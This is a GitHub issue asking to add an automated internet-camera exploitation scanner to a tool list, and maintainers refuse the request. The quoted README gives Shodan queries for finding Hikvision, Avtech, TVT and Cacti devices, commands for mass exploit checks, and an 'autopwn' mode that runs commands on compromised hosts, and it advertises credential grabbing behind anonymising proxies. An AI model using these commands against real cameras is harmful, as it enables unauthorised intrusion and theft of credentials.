Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[addtool] Camera Exploitation Tool #1116

Closed
piyush-security opened this issue May 3, 2023 · 4 comments
Closed

[addtool] Camera Exploitation Tool #1116

piyush-security opened this issue May 3, 2023 · 4 comments
Labels
enhancement New feature or request refused

Comments

@piyush-security
Copy link

[homepage]
https://github.com/TasosY2K/camera-exploit-tool
[/homepage]

[tags]
camera, exploitation, scanner
[/tags]

[short_descr]
Automated exploit scanner for cameras on the internet.
[/short_descr]

[long_descr]

Internet Camera Exploitation Tool

This is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.io

I was able to discover thousands of vulnerable cameras using it
image
image
image

Vendors Affected

[+] Hikvision

[+] Avtech

[+] TVT

[+] Cacti

more to come...

Features

  • Fetching of hosts from shodan.io
  • Check for vulnerable cameras
  • Automatically run commands on exploited devices (Only Hikvision for now)
  • Automatically grab camera credentials (Only for Avtech)
  • Multi-threading for faster scanning
  • Usage of Socks5 proxies for anonymity
  • Storing results in Sqlite3 database
  • Logging all actions in log files

Prerequisites

To use this tool you need to have the following:

  • Shodan API key (Membership required for more than 1 page)
  • Socks5 authenticated proxies

Installation

git clone https://github.com/TasosY2K/camera-exploit-tool
pip install -r requirements.txt
python3 scanner.py --help

Usage

Collect hosts in database
# Collect Hikvision hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Hikvision IP Camera"' --pages 1

# Collect Avtech hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'linux upnp avtech' --pages 1

# Collect TVT hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Cross Web Server"' --pages 1

# Collect Cacti hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'Login to Cacti' --pages 1
Check hosts for exploit
python3 scanner.py --check --proxy-file proxies.txt --threads 20
Automatically run command on exploited hosts
python3 scanner.py --autopwn --proxy-file proxies.txt --payload "id"

Exploits Used

https://www.exploit-db.com/exploits/40500

2021-36260 https://www.exploit-db.com/exploits/50441

https://github.com/k1p0d/h264_dvr_rce

CVE-2022-46169 https://github.com/sAsPeCt488/CVE-2022-46169

[/long_descr]

[image]
image

[/image]
@gwen001
Copy link
Owner

gwen001 commented May 4, 2023

Issue correctly handled, tool is waiting for human validation.

@gwen001 gwen001 added enhancement New feature or request and removed enhancement New feature or request labels May 4, 2023
@gwen001
Copy link
Owner

gwen001 commented May 4, 2023

Issue correctly handled, tool is waiting for human validation.

@gwen001 gwen001 added the enhancement New feature or request label May 4, 2023
@gwen001
Copy link
Owner

gwen001 commented May 9, 2023

Tool has been refused by the team, feel free to get in touch if you have any question.

Thank you!

@gwen001 gwen001 closed this as completed May 9, 2023
@gwen001 gwen001 added wontfix This will not be worked on and removed enhancement New feature or request labels May 9, 2023
@gwen001
Copy link
Owner

gwen001 commented May 13, 2023

Tool has been refused by the team, feel free to get in touch if you have any question.

Thank you!

@gwen001 gwen001 added enhancement New feature or request refused and removed wontfix This will not be worked on labels Dec 7, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
enhancement New feature or request refused
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@gwen001 @piyush-security